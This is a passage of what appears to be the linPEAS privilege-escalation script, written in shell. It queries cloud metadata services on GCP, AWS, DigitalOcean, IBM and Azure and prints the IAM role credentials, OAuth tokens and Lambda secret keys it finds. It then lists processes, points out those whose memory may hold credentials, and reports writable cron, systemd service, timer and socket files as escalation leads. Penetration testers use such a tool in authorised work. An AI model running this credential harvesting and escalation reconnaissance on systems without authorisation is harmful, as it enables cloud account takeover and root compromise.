"s,${GCP_BAD_SCOPES},${SED_RED},g" echo " Token: "$(eval $gcp_req
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/token")
echo " ============== " done fi fi # AWS ECS Enumeration if [ "$is_aws_ecs" =
"Yes" ]; then print_2title "AWS ECS Enumeration" aws_ecs_req="" if [ "$(command
-v curl)" ]; then aws_ecs_req='curl -s -f' elif [ "$(command -v wget)" ]; then
aws_ecs_req='wget -q -O -' else echo "Neither curl nor wget were found, I can't
enumerate the metadata service :(" fi if [ "$aws_ecs_metadata_uri" ]; then
print_3title "Container Info" exec_with_jq eval $aws_ecs_req
"$aws_ecs_metadata_uri" echo "" print_3title "Task Info" exec_with_jq eval
$aws_ecs_req "$aws_ecs_metadata_uri/task" echo "" else echo "I couldn't find
ECS_CONTAINER_METADATA_URI env var to get container info" fi if [
"$aws_ecs_service_account_uri" ]; then print_3title "IAM Role" exec_with_jq eval
$aws_ecs_req "$aws_ecs_service_account_uri" echo "" else echo "I couldn't find
AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var to get IAM role info (the task is
running without a task role probably)" fi fi # AWS EC2 Enumeration if [
"$is_aws_ec2" = "Yes" ]; then print_2title "AWS EC2 Enumeration"
HEADER="X-aws-ec2-metadata-token: $EC2_TOKEN"
URL="http://169.254.169.254/latest/meta-data" aws_req="" if [ "$(command -v
curl)" ]; then aws_req="curl -s -f -H '$HEADER'" elif [ "$(command -v wget)" ];
then aws_req="wget -q -O - -H '$HEADER'" else echo "Neither curl nor wget were
found, I can't enumerate the metadata service :(" fi if [ "$aws_req" ]; then
printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo "" printf "instance-action:
"; eval $aws_req "$URL/instance-action"; echo "" printf "instance-id: "; eval
$aws_req "$URL/instance-id"; echo "" printf "instance-life-cycle: "; eval
$aws_req "$URL/instance-life-cycle"; echo "" printf "instance-type: "; eval
$aws_req "$URL/instance-type"; echo "" printf "region: "; eval $aws_req
"$URL/placement/region"; echo "" echo "" print_3title "Account Info"
exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/info"; echo "" echo ""
print_3title "Network Info" for mac in $(eval $aws_req
"$URL/network/interfaces/macs/" 2>/dev/null); do echo "Mac: $mac" printf "Owner
ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
printf "Public Hostname: "; eval $aws_req
"$URL/network/interfaces/macs/$mac/public-hostname"; echo "" printf "Security
Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups";
echo "" echo "Private IPv4s:"; eval $aws_req
"$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo "" printf "Subnet
IPv4: "; eval $aws_req
"$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo "" echo
"PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo
"" printf "Subnet IPv6: "; eval $aws_req
"$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo "" echo
"Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s";
echo "" echo "" done echo "" print_3title "IAM Role" exec_with_jq eval $aws_req
"$URL/iam/info"; echo "" for role in $(eval $aws_req
"$URL/iam/security-credentials/" 2>/dev/null); do echo "Role: $role"
exec_with_jq eval $aws_req "$URL/iam/security-credentials/$role"; echo "" echo
"" done echo "" print_3title "User Data" eval $aws_req
"http://169.254.169.254/latest/user-data"; echo "" echo "" echo "EC2 Security
Credentials" exec_with_jq eval $aws_req
"$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo ""
print_3title "SSM Runnig" ps aux 2>/dev/null | grep "ssm-agent" | grep -v "grep"
| sed "s,ssm-agent,${SED_RED}," fi fi # AWS Lambda Enumeration if [
"$is_aws_lambda" = "Yes" ]; then print_2title "AWS Lambda Enumeration" printf
"Function name: "; env | grep AWS_LAMBDA_FUNCTION_NAME printf "Region: "; env |
grep AWS_REGION printf "Secret Access Key: "; env | grep AWS_SECRET_ACCESS_KEY
printf "Access Key ID: "; env | grep AWS_ACCESS_KEY_ID printf "Session token: ";
env | grep AWS_SESSION_TOKEN printf "Security token: "; env | grep
AWS_SECURITY_TOKEN printf "Runtime API: "; env | grep AWS_LAMBDA_RUNTIME_API
printf "Event data: "; (curl -s
"http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next"
2>/dev/null || wget -q -O -
"http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next") fi # AWS
Codebuild Enumeration if [ "$is_aws_codebuild" = "Yes" ]; then print_2title "AWS
Codebuild Enumeration" aws_req="" if [ "$(command -v curl)" ]; then
aws_req="curl -s -f" elif [ "$(command -v wget)" ]; then aws_req="wget -q -O -"
else echo "Neither curl nor wget were found, I can't enumerate the metadata
service :(" echo "The addresses are in /codebuild/output/tmp/env.sh" fi if [
"$aws_req" ]; then print_3title "Credentials" CREDS_PATH=$(cat
/codebuild/output/tmp/env.sh | grep "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" |
cut -d "'" -f 2) URL_CREDS="http://169.254.170.2$CREDS_PATH" # Already has a /
at the begginig exec_with_jq eval $aws_req "$URL_CREDS"; echo "" print_3title
"Container Info" METADATA_URL=$(cat /codebuild/output/tmp/env.sh | grep
"ECS_CONTAINER_METADATA_URI" | cut -d "'" -f 2) exec_with_jq eval $aws_req
"$METADATA_URL"; echo "" fi fi # DO Droplet Enumeration if [ "$is_do" = "Yes" ];
then print_2title "DO Droplet Enumeration" do_req="" if [ "$(command -v curl)"
]; then do_req='curl -s -f ' elif [ "$(command -v wget)" ]; then do_req='wget -q
-O - ' else echo "Neither curl nor wget were found, I can't enumerate the
metadata service :(" fi if [ "$do_req" ]; then
URL="http://169.254.169.254/metadata" printf "Id: "; eval $do_req "$URL/v1/id";
echo "" printf "Region: "; eval $do_req "$URL/v1/region"; echo "" printf "Public
keys: "; eval $do_req "$URL/v1/public-keys"; echo "" printf "User data: "; eval
$do_req "$URL/v1/user-data"; echo "" printf "Dns: "; eval $do_req
"$URL/v1/dns/nameservers" | tr '\n' ','; echo "" printf "Interfaces: "; eval
$do_req "$URL/v1.json" | jq ".interfaces"; printf "Floating_ip: "; eval $do_req
"$URL/v1.json" | jq ".floating_ip"; printf "Reserved_ip: "; eval $do_req
"$URL/v1.json" | jq ".reserved_ip"; printf "Tags: "; eval $do_req "$URL/v1.json"
| jq ".tags"; printf "Features: "; eval $do_req "$URL/v1.json" | jq ".features";
fi fi # IBM Cloud Enumeration if [ "$is_ibm_vm" = "Yes" ]; then print_2title
"IBM Cloud Enumeration" if ! [ "$IBM_TOKEN" ]; then echo "Couldn't get the
metadata token:(" else TOKEN_HEADER="Authorization: Bearer $IBM_TOKEN"
ACCEPT_HEADER="Accept: application/json"
URL="http://169.254.169.254/latest/meta-data" ibm_req="" if [ "$(command -v
curl)" ]; then ibm_req="curl -s -f -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'" elif
[ "$(command -v wget)" ]; then ibm_req="wget -q -O - -H '$TOKEN_HEADER' -H
'$ACCEPT_HEADER'" else echo "Neither curl nor wget were found, I can't enumerate
the metadata service :(" fi if [ "$ibm_req" ]; then print_3title "Instance
Details" exec_with_jq eval $ibm_req
"http://169.254.169.254/metadata/v1/instance?version=2022-03-01" print_3title
"Keys and User data" exec_with_jq eval $ibm_req
"http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01"
exec_with_jq eval $ibm_req
"http://169.254.169.254/metadata/v1/keys?version=2022-03-01" print_3title
"Placement Groups" exec_with_jq eval $ibm_req
"http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01"
print_3title "IAM credentials" exec_with_jq eval $ibm_req -X POST
"http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01" fi fi
fi # Azure VM Enumeration if [ "$is_az_vm" = "Yes" ]; then print_2title "Azure
VM Enumeration" HEADER="Metadata:true" URL="http://169.254.169.254/metadata"
API_VERSION="2021-12-13" #
https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
az_req="" if [ "$(command -v curl)" ]; then az_req="curl -s -f -H '$HEADER'"
elif [ "$(command -v wget)" ]; then az_req="wget -q -O - -H '$HEADER'" else echo
"Neither curl nor wget were found, I can't enumerate the metadata service :(" fi
if [ "$az_req" ]; then print_3title "Instance details" exec_with_jq eval $az_req
"$URL/instance?api-version=$API_VERSION" print_3title "Load Balancer details"
exec_with_jq eval $az_req "$URL/loadbalancer?api-version=$API_VERSION"
print_3title "Management token" exec_with_jq eval $az_req
"$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://management.azure.com/"
print_3title "Graph token" exec_with_jq eval $az_req
"$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
print_3title "Vault token" exec_with_jq eval $az_req
"$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://vault.azure.net/"
print_3title "Storage token" exec_with_jq eval $az_req
"$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://storage.azure.com/"
fi fi if [ "$check_az_app" = "Yes" ]; then print_2title "Azure App Service
Enumeration" echo "I haven't tested this one, if it doesn't work, please send a
PR fixing and adding functionality :)" HEADER="secret:$IDENTITY_HEADER"
az_req="" if [ "$(command -v curl)" ]; then az_req="curl -s -f -H '$HEADER'"
elif [ "$(command -v wget)" ]; then az_req="wget -q -O - -H '$HEADER'" else echo
"Neither curl nor wget were found, I can't enumerate the metadata service :(" fi
if [ "$az_req" ]; then print_3title "Management token" exec_with_jq eval $az_req
"$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://management.azure.com/"
print_3title "Graph token" exec_with_jq eval $az_req
"$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
print_3title "Vault token" exec_with_jq eval $az_req
"$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://vault.azure.net/"
print_3title "Storage token" exec_with_jq eval $az_req
"$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://storage.azure.com/"
fi fi fi echo '' echo '' if [ "$WAIT" ]; then echo "Press enter to continue";
read "asd"; fi if echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets; then
print_title "Processes, Crons, Timers, Services and Sockets"
#################################################### #-----) Processes & Cron &
Services & Timers (-----# ####################################################
if ! [ "$SEARCH_IN_FOLDER" ]; then #-- PCS) Cleaned proccesses print_2title
"Cleaned processes" if [ "$NOUSEPS" ]; then printf ${BLUE}"[i]$GREEN Looks like
ps is not finding processes, going to read from /proc/ and not going to monitor
1min of processes\n"$NC fi print_info "Check weird & unexpected proceses run by
root:
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes" if [
-f "/etc/fstab" ] && cat /etc/fstab | grep -q "hidepid=2"; then echo "Looks like
/etc/fstab has hidepid=2, so ps will not show processes of other users" fi if [
"$NOUSEPS" ]; then print_ps | grep -v 'sed-Es' | sed -${E}
"s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed
-${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," |
sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," |
sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed
"s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
pslist=$(print_ps) else (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v
"\[" | grep -v "%CPU" | while read psline; do echo "$psline" | sed -${E}
"s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed
-${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," |
sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," |
sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed
"s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," if [
"$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then cpid=$(echo
"$psline" | awk '{print $2}') caphex=0x"$(cat /proc/$cpid/status 2> /dev/null |
grep CapEff | awk '{print $2}')" if [ "$caphex" ] && [ "$caphex" != "0x" ] &&
echo "$caphex" | grep -qv '0x0000000000000000'; then printf " └─(${DG}Caps${NC})
"; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E}
"s,$capsB,${SED_RED},g" fi fi done pslist=$(ps auxwww) echo "" #-- PCS) Binary
processes permissions print_2title "Binary processes permissions (non 'root
root' and not belonging to current user)" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes"
binW="IniTialiZZinnggg" ps auxwww 2>/dev/null | awk '{print $11}' | while read
bpath; do if [ -w "$bpath" ]; then binW="$binW|$bpath" fi done ps auxwww
2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++'
2>/dev/null | grep -v " root root " | grep -v " $USER " | sed -${E}
"s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" |
sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed
-${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed
"s,root,${SED_GREEN}," fi echo "" fi CURRENT_USER_PIVOT_PID="" if ! [
"$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then #-- PCS) Process opened by other
users print_2title "Processes whose PPID belongs to a different user (not root)"
print_info "You will know if a user can somehow spawn processes as a different
user" # Function to get user by PID get_user_by_pid() { ps -p "$1" -o user |
grep -v "USER" } # Find processes with PPID and user info, then filter those
where PPID's user is different from the process's user ps -eo pid,ppid,user |
grep -v "PPID" | while read -r pid ppid user; do if [ "$ppid" = "0" ]; then
continue fi ppid_user=$(get_user_by_pid "$ppid") if echo "$user" | grep -Eqv
"$ppid_user|root$"; then echo "Proc $pid with ppid $ppid is run by user $user
but the ppid user is $ppid_user" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," |
sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," |
sed "s,root,${SED_RED}," if [ "$ppid_user" = "$USER" ]; then
CURRENT_USER_PIVOT_PID="$ppid" fi fi done echo "" fi if ! [ "$SEARCH_IN_FOLDER"
]; then #-- PCS) Files opened by processes belonging to other users if ! [
"$IAMROOT" ]; then print_2title "Files opened by processes belonging to other
users" print_info "This is usually empty because of the lack of privileges to
read other user processes information" lsof 2>/dev/null | grep -v "$USER" | grep
-iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed
"s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed
"s,root,${SED_RED}," echo "" fi fi if ! [ "$SEARCH_IN_FOLDER" ]; then #-- PCS)
Processes with credentials inside memory print_2title "Processes with
credentials in memory (root req)" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory"
if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process
found (dump creds from memory as root)" | sed "s,gdm-password
process,${SED_RED},"; else echo_not_found "gdm-password"; fi if echo "$pslist" |
grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found
(dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},";
else echo_not_found "gnome-keyring-daemon"; fi if echo "$pslist" | grep -q
"lightdm"; then echo "lightdm process found (dump creds from memory as root)" |
sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi if echo "$pslist"
| grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as
root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi if echo
"$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from
memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2";
fi if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump
creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found
"sshd"; fi echo "" fi if ! [ "$SEARCH_IN_FOLDER" ]; then #-- PCS) Different
processes 1 min if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then print_2title
"Different processes executed during 1 min (interesting is low number of
repetitions)" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#frequent-cron-jobs"
temp_file=$(mktemp) if [ "$(ps -e -o user,command 2>/dev/null)" ]; then for i in
$(seq 1 1210); do ps -e -o user,command >> "$temp_file" 2>/dev/null; sleep 0.05;
done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed
'/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]" | sed -${E}
"s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed
"s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed
"s,root,${SED_RED},"; rm "$temp_file"; fi echo "" fi fi if ! [
"$SEARCH_IN_FOLDER" ]; then #-- PCS) Cron print_2title "Cron jobs" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs"
command -v crontab 2>/dev/null || echo_not_found "crontab" crontab -l
2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed
-${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," |
sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," command -v
incrontab 2>/dev/null || echo_not_found "incrontab" incrontab -l 2>/dev/null ls
-alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed
-${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" cat
/etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/*
/var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#" | sed -${E}
"s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," |
sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," |
sed "s,root,${SED_RED}," crontab -l -u "$USER" 2>/dev/null | tr -d "\r" ls -lR
/usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/
2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed
"s,$cronjobsB,${SED_RED},g" #MacOS paths atq 2>/dev/null else print_2title "Cron
jobs" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs"
find "$SEARCH_IN_FOLDER" '(' -type d -or -type f ')' '(' -name "cron*" -or -name
"anacron" -or -name "anacrontab" -or -name "incron.d" -or -name "incron" -or
-name "at" -or -name "periodic" ')' -exec echo {} \; -exec ls -lR {} \; fi echo
"" if ! [ "$SEARCH_IN_FOLDER" ]; then if [ "$MACPEAS" ]; then print_2title
"Third party LaunchAgents & LaunchDemons" print_info
"https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd"
ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/
~/Library/LaunchDaemons/ 2>/dev/null echo "" print_2title "Writable System
LaunchAgents & LaunchDemons" find /System/Library/LaunchAgents/
/System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ |
grep ".plist" | while read f; do program="" program=$(defaults read "$f" Program
2>/dev/null) if ! [ "$program" ]; then program=$(defaults read "$f"
ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) fi if [ -w "$program"
]; then echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
done echo "" print_2title "StartupItems" print_info
"https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items"
ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null echo ""
print_2title "Login Items" print_info
"https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items"
osascript -e 'tell application "System Events" to get the name of every login
item' 2>/dev/null echo "" print_2title "SPStartupItemDataType" system_profiler
SPStartupItemDataType echo "" print_2title "Emond scripts" print_info
"https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond"
ls -l /private/var/db/emondClients echo "" fi fi if ! [ "$SEARCH_IN_FOLDER" ];
then #-- PCS) Services if [ "$EXTRA_CHECKS" ]; then print_2title "Services"
print_info "Search for outdated versions" (service --status-all || service -e ||
chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found
"service|chkconfig|rc-status|launchctl" echo "" fi fi if ! [ "$SEARCH_IN_FOLDER"
]; then #-- PSC) systemd PATH print_2title "Systemd PATH" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths"
systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E}
"s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" WRITABLESYSTEMDPATH=$(systemctl
show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") echo "" fi #--
PSC) .service files #TODO: .service files in MACOS are folders print_2title
"Analyzing .service files" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services"
printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do if [ ! -O "$s" ] || [
"$SEARCH_IN_FOLDER" ]; then #Remove services that belongs to the current user or
if firmware see everything if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ] &&
! [ "$SEARCH_IN_FOLDER" ]; then echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
fi servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s"
2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths printf
"%s\n" "$servicebinpaths" | while read sp; do if [ -w "$sp" ]; then echo "$s is
calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g"
fi done relpath1=$(grep -E
'^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep
-Iv "=/") relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null)
if [ "$relpath1" ] || [ "$relpath2" ]; then if [ "$WRITABLESYSTEMDPATH" ]; then
echo "$s could be executing some relative path" | sed -${E} "s,.*,${SED_RED},";
else echo "$s could be executing some relative path" fi fi fi done if [ !
"$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed
-${E} "s,.*,${SED_GREEN},"; fi echo "" if ! [ "$SEARCH_IN_FOLDER" ]; then #--
PSC) Timers print_2title "System timers" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers"
(systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed
-${E} "s,$timersG,${SED_GREEN},") || echo_not_found echo "" fi #-- PSC) .timer
files print_2title "Analyzing .timer files" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers" printf
"%s\n" "$PSTORAGE_TIMER" | while read t; do if ! [ "$IAMROOT" ] && [ -w "$t" ]
&& ! [ "$SEARCH_IN_FOLDER" ]; then echo "$t" | sed -${E} "s,.*,${SED_RED},g" fi
timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) printf
"%s\n" "$timerbinpaths" | while read tb; do if [ -w "$tb" ]; then echo "$t timer
is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" fi
done #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" #for rp in
"$relpath"; do # echo "$t is calling a relative path: $rp" | sed
"s,relative.*,${SED_RED},g" #done done echo "" #-- PSC) .socket files #TODO:
.socket files in MACOS are folders if ! [ "$IAMROOT" ]; then print_2title
"Analyzing .socket files" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets"
printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do if ! [ "$IAMROOT" ] && [ -w
"$s" ] && [ -f "$s" ] && ! [ "$SEARCH_IN_FOLDER" ]; then echo "Writable .socket
file: $s" | sed "s,/.*,${SED_RED},g" fi socketsbinpaths=$(grep -Eo
'^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed
's,^[@\+!-]*,,') printf "%s\n" "$socketsbinpaths" | while read sb; do if [ -w
"$sb" ]; then echo "$s is calling this writable executable: $sb" | sed
"s,writable.*,${SED_RED},g" fi done socketslistpaths=$(grep -Eo
'^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed
's,^[@\+!-]*,,') printf "%s\n" "$socketslistpaths" | while read sl; do if [ -w
"$sl" ]; then echo "$s is calling this writable listener: $sl" | sed
"s,writable.*,${SED_RED},g"; fi done done echo "" if ! [ "$SEARCH_IN_FOLDER" ];
then print_2title "Unix Sockets Listening" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets" #
Search sockets using netstat and ss unix_scks_list=$(ss -xlp -H state listening
2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) if ! [ "$unix_scks_list" ];then
unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep
-Eo "/[a-zA-Z0-9\._/\-]+") fi if ! [ "$unix_scks_list" ];then
unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep
-Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) fi unix_scks_list3=$(lsof -U 2>/dev/null
| awk '{print $9}' | grep "/") fi if ! [ "$SEARCH_IN_FOLDER" ]; then # But also
search socket files unix_scks_list2=$(find / -type s 2>/dev/null) else
unix_scks_list2=$(find "SEARCH_IN_FOLDER" -type s 2>/dev/null) fi # Detele
repeated dockets and check permissions (printf "%s\n" "$unix_scks_list" &&
printf "%s\n" "$unix_scks_list2" && printf "%s\n" "$unix_scks_list3") | sort |
uniq | while read l; do perms="" if [ -r "$l" ]; then perms="Read " fi if [ -w
"$l" ];then perms="${perms}Write" fi if [ "$EXTRA_CHECKS" ] && [ "$(command -v
curl)" ]; then CANNOT_CONNECT_TO_SOCKET="$(curl -v --unix-socket "$l" --max-time
1 http:/linpeas 2>&1 | grep -i 'Permission denied')" if ! [
"$CANNOT_CONNECT_TO_SOCKET" ]; then perms="${perms} - Can Connect" else
perms="${perms} - Cannot Connect" fi fi if ! [ "$perms" ]; then echo "$l" | sed
-${E} "s,$l,${SED_GREEN},g"; else echo "$l" | sed -${E} "s,$l,${SED_RED},g" echo
" └─(${RED}${perms}${NC})" | sed -${E} "s,Cannot Connect,${SED_GREEN},g" # Try
to contact the socket socketcurl=$(curl --max-time 2 --unix-socket "$s"
http:/index 2>/dev/null) if [ $? -eq 0 ]; then owner=$(ls -l "$s" | cut -d ' '
-f 3) echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)"
| sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" |
sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed
"s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed
-${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E}
"s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" echo
"$socketcurl" | head -n 30 fi fi done echo "" fi #-- PSC) Writable and weak
policies in D-Bus config files print_2title "D-Bus config files" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus" if [
"$PSTORAGE_DBUS" ]; then printf "%s\n" "$PSTORAGE_DBUS" | while read d; do for f
in $d/*; do if ! [ "$IAMROOT" ] && [ -w "$f" ] && ! [ "$SEARCH_IN_FOLDER" ];
then echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" fi genpol=$(grep
"<policy>" "$f" 2>/dev/null) if [ "$genpol" ]; then printf "Weak general policy
found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed
"s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E}
"s,$mygroups,${SED_RED},g"; fi #if [ "`grep \"<policy user=\\\"$USER\\\">\"
\"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f ()
\n" | sed "s,$USER,${SED_RED},g"; fi userpol=$(grep "<policy user=" "$f"
2>/dev/null | grep -v "root") if [ "$userpol" ]; then printf "Possible weak user
policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" |
sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E}
"s,$mygroups,${SED_RED},g"; fi #for g in `groups`; do # if [ "`grep \"<policy
group=\\\"$g\\\">\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group
($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi #done grppol=$(grep
"<policy group=" "$f" 2>/dev/null | grep -v "root") if [ "$grppol" ]; then
printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E}
